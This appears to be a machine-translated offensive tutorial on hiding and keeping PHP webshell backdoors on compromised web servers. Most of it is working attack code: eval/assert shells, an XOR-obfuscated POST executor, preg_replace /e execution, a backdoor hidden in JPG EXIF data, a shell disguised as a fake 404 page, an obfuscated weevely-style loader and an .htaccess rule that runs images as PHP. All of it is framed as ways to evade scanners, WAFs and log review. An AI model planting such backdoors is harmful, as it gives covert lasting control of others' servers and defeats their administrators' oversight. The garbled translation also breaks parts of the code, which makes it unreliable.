PHP backdoor hiding and maintenance tips

After a successful test, you usually want to keep the privilege longer. The job of leaving the back door is very important, usually the backdoor is laid out including but not limited to database permissions, Web permissions, System user permissions, and so on. This article on the public back door hidden some ideas to do science.

AD:

0x00 Preface

After a successful test, you usually want to keep the privilege longer. The job of leaving the back door is very important, usually the backdoor is laid out including but not limited to database permissions, Web permissions, System user permissions, and so on. This article on the public back door hidden some ideas to do science.

Taking Php-webbackdoor as an example,

One of the most common words the backdoor might write like this

1. <?php @eval ($_post[' cmd ');? >

Or so

1. <?php @assert ($_post[' cmd ');? >

Of course, this is only called the function is different, about PHP disabled functions in the php.ini:disable_functions search.

But there are many ways in which OPS can intuitively look for our shells, such as

File backup compare to find exception by filename/Modify time/Size

Through the Webshell backdoor scan script found, such as scanbackdoor.php/pecker/shelldetect.php and various scanners and so on

Find back door through Access.log access log

Or, our test will be blocked by a WAF, a warning log, and so on.

For common detection methods, summarize the following seven common techniques to hide the shell

0x01 evasion

Look at the various scanning backdoor code to know, to stay a well-known, raves keyword in the shell is absolutely impossible

Common keywords such as:

System command execution: Systems, PassThru, shell_exec, exec, Popen, Proc_open

Code execution: eval, assert, Call_user_func,base64_decode, Gzinflate, gzuncompress, Gzdecode, str_rot13

Files include: Require, require_once, include, Include_once, file_get_contents, File_put_contents, fputs, fwrite

Used to have friends wit use $_post[0] ($_post[1]) to execute orders, but now also difficult to escape the scanner, but Vientiane changes, the construction method is infinite

Tudouya students on the freebuf to give [a construction technique] (http://www.freebuf.com/articles/web/33824.html) use

2. <?php
4. @$_++; //$_ = 1
6. $__=("#"^"|"); // $__ = _  
8. $__.=("." ^"~"); //_p
10. $__.=("/"^"`"); //_po
12. $__.=("|" ^"/"); //_pos
14. $__.=("{"^"/"); //_post
16. ${$__}[! $_](${$__}[$_]);  //$_post[0] ($_post[1]);
18. ?>

Construction generated, of course, too intuitive to write like this

1. <?php @$_++; $__=("#"^"|"). ("." ^"~"). ("/"^"`"). ("|" ^"/"). ("{"^"/");@${$__}[! $_](${$__}[$_]);? >

Then fill in some common code to disguise, a simple "kill-free" shell sample appears

Execute without error, bypassing normal scanners, and can also rely on new temporary shells

0x02 characteristics

It is also an interesting way to execute commands with the help of grammatical features. Borrowing PHP's syntax when dealing with variables, it analyzes whether the data in the double quotes contains variables (and parses their values)

eg.:

1. ${@eval (phpinfo ())}

{} can parse variable contents in double quotation marks, keep execution after error

Then you can start to build a hidden back door, but here we construct the command to be executed by force in the function, yes, it is preg_replace

1. <?php @preg_replace ("//e",$_post[' cmd '],"");? >

This play obviously has been in the scanner blacklist, simple modification under

1. <?php
2. function Funfunc ($str) {}
3. Echo preg_replace ("/<title> (. +?)  <\/title>/ies ", ' Funfunc (" \1 ") ', $_post[" cmd "]);
4. ?>

executed, not found.

The way to do it is obvious that code execution is caused when the regular match {${phpinfo ()}} passes into the Funfunc

1. Funfunc ("{${phpinfo ()}}")

A different approach

1. <?php @assert ("\ $arr =\" ". $_get[' cmd ']." \";");? >

0X03 contains

The file contains a method that everyone has played, but contains and tricks.

Ordinary file contains may be just an include contains a txt or JPG, or even leave a contain a vulnerability, but the scanner is also easy to find, more out of the included files are also easy to find

Look at this script

2. <?php
4. if (@isset ($_get[content) )
6. {
8. $fp =fopen (' README ',' W ');
10. file_put_contents (' README ', '<?php\r\n ');
12. @file_put_contents (' README ',$_get[content],file_append);
14. Fclose ($fp);
16. require ' README ';}
18. ?>

To solve a problem, the shell of the requirement can be generated with the use, and then contain the

Unfortunately due to file_put_contents and other functions are too sensitive, it is easy to scan the discovery

The way the code is generated creates the shell, which is generated with access.

1. <?php @fputs (fopen (base64_decode (' CGX1Z2LUX20UCGHW '), W),base64_decode ('  pd9wahagqgfzc2vydcgkx1bpu1rbj2ntzcddkts/pg== '));
2. ?>

Can evade some scanners, but this mode is also more compelling, the resulting new files to do a simple hide to avoid avira.

Of course, the new concepts such as heuristics are not considered.

In this way also can not meet the needs of the situation, the witty attackers re-pick up the picture

1. <?php $exif =exif_read_data ('./lol.jpg ');p reg_replace ($exif [' make '],$exif [' Model ' ],');? >

Reference: A backdoor hidden in a JPG image in EXIF

This time, no more simple copy/b generation of picture horses, borrowing preg_replace to execute a specific flag of the file as feasible

You may be prompted for call to undefined function exif_read_data () here

Need to modify php.ini, Extension=php_exif.dll

Change its load order to the back of Extension=php_mbstring.dll

As can be seen, this picture back door with the help of Preg_replace \e parameters, relying on PHP variable parsing execution, and the use of Base64 encoding, and finally rely on the file identification of a complete shell, as the first backdoor hidden children's shoes a small reminder

Of course, as long as there is a containing point, the form of the containing file is diverse, even contains error_log (although it may be considered closed), only unexpectedly ...

0X04 Stealth

To keep visitors from discovering the backdoor, smart security researchers will confuse

2. <! DOCTYPE HTML public "-//IETF//DTD html 2.0//en" >
6. <title>404 not found</title>
10. <body>
14. <p>the requested URL is not found on this server.</p>
16. </body>
20. <?php
22. @preg_replace ("/[checksql]/e",$_post[' cmd '),"Saft");
24. ?>

With the above HTML rendering, the browsing page has begun to disguise 404 to Patinia.

But you can hide from the visitor. Log analysis, for better hiding in a large number of logs, construct the following script

1. <?php
2. Header (' http/1.1 404 ');
3. Ob_start ();
4. @fputs (fopen (base64_decode (' CGX1Z2LUX20UCGHW '), W),base64_decode ('  pd9wahagqgfzc2vydcgkx1bpu1rbj2ntzcddkts/pg== '));
5. Ob_end_clean ();
6. ?>

Access to the real 404, yes, the log is the same

But at the moment the current directory has generated the script we want to connect to

0x05 confusion

Children's shoes with the weevely tool should know that the resulting kill-free shell looks like this

2. <?php
4. $penh ="sigpvaw4oyxjyygixlfc2xpy2uojgesgijgmojgepltgimpkskpgikttly2hvicc8lycgiujgigsugijz4no30=";
6. $kthe ="JGEPPJGIMPEYRRPSGIDWCYC7ZWNOBYANPCCGIUGIJGSUJZ4NOGI2V2YWWOYGIMFZZTY0X2GIRLY2GI9KGIZSHWCMVN";
8. $FTDF = str_replace ("w", "" ","stwrw_wrwepwlwawcwe ");
10. $wmmi ="X3jlcgigxhy2ugioyxgijyyxkojy9bxlx3pvgixzxs8nlcgicvxhmvjyksigfycmf5kccnlccrgijyk";
12. $zrmt ="Jgm9j2nvdwgi50jzskgiyt0gikx0ngipt0tjrgittpzihyzxnldcgkysk9psgidvbycggijgiiygjgmo";
14. $SMGV = $ftdf ("F", " " ", " bfafsfef6f4_fdfefcodfe ");
16. $jgfi = $ftdf ("L", "" "," Lclrlelaltel_functlilon ");
18. $RDWM = $jgfi (", $SMGV ($ftdf (" GI "," " , $zrmt. $kthe. $wmmi. $penh)));  $RDWM ();
20. ?>

After the terminal is connected like this

Ps: Forgot to modify the terminal code: (

The way to kill it is to generate a random name variable in the fixed area, and then use Str_replace to flatten the Base64_decode to execute the command.

Of course, it's confusing at the code level to avoid scanners.

A more common method of confusing:

Modify file Time

Renamed into the folder after uploading, so that people can not visualize the file exception

File size spoofing (at least look at size like a normal script)

Choose your hiding path and access as little as possible

Malformed Directory%20

About the space directory, or relatively easy to find

0X06 parsing

Using. htaccess, add parse Backdoor

Such as:

1. AddType application/x-httpd-php. jpg

Above take weeverly as an example

0x07

Summing up the above method, most is nothing more than a process of constructing a loophole, the code of the loophole constructs can have how wonderful, the back door can be more wonderful. Can write slender graceful, also can make simple rough, just apply occasion is different only. If you can integrate ideas well, It is not difficult to construct your own hidden shell. The above is only a summary of the experience, you have interesting ideas also hope to enlighten.

PHP backdoor hiding and maintenance tips